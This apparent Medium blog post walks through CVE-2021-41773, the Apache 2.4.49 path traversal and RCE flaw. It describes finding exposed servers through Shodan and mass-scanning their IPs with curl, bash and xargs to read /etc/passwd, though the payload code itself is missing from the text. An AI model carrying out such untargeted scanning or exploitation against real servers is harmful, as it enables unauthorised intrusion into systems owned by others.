Finding and Exploiting Path traversal in apache 2.4.49 http server [CVE-2021–41773]

In October 4th Apache disclosed a vulnerability introduced on Apache HTTP Server 2.4.49 marked as CVE-2021–41773.At the same time Apache released a patch for this vulnerability with its new version 2.4.50 . This vulnerability allows an attacker to bypass path traversal protection using encoding . Bypass looks something like this.

Its also possible to perform rce [Remote code execution] if mode_cgi is enabled . Modern web-technology doesn’t use it anymore however old website which usage old technology are still using this functionality. Exploitation process is easy which can be performed with curl also. Lets see how we can find websites using this apache version. We will use our favorite search engine . Using this simple query we can find potentially vulnerable apache 2.4.49 http server.

We Got 78,219 results , those server usage apache 2.4.49 but all of them are not vulnerable , we need to filter the vulnerable ones , we can do that using bash , lets mix up our script with exploit. Exploit with curl was something like that.

This only exploits the server and shows us the content/text of /etc/passwd. lets create a detection script with it .

Now lets download the results from shodan. But our script takes one argument at a time how can we give it multiple input .

We can filter ip from the downloaded result using regex.

We stored all the ip on ip.txt , now lets scan it for vulnerability using our bash and xargs

we can use httprobe to detect if the target use http or https protocol.

for bug hunters , you can use the same process with all the subdomains you got.

cat subdomains.txt | httprobe | xargs -n1 -P10 bash | tee -a result.txt

[ This article was for educational and research purpose only , we do not promote to harm others property without permission.]



Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joy Ghosh

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer